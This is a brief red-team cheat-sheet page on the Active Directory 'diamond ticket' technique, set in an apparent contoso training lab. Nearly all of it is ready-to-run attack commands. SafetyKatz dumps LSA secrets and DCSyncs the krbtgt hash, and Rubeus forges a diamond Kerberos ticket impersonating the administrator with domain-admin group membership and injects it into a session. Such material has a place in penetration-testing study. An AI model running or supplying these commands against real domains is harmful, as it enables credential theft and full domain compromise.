diamond-ticket
Methodology
Binaries
SafetyKatz
SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'Rubeus
Rubeus.exe diamond /krbkey:32ED87BDB5FDC5E9CBA88547376818D4 /user:studentuserx /password:studentuserxpassword /enctype:rc4 /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /pttLast updated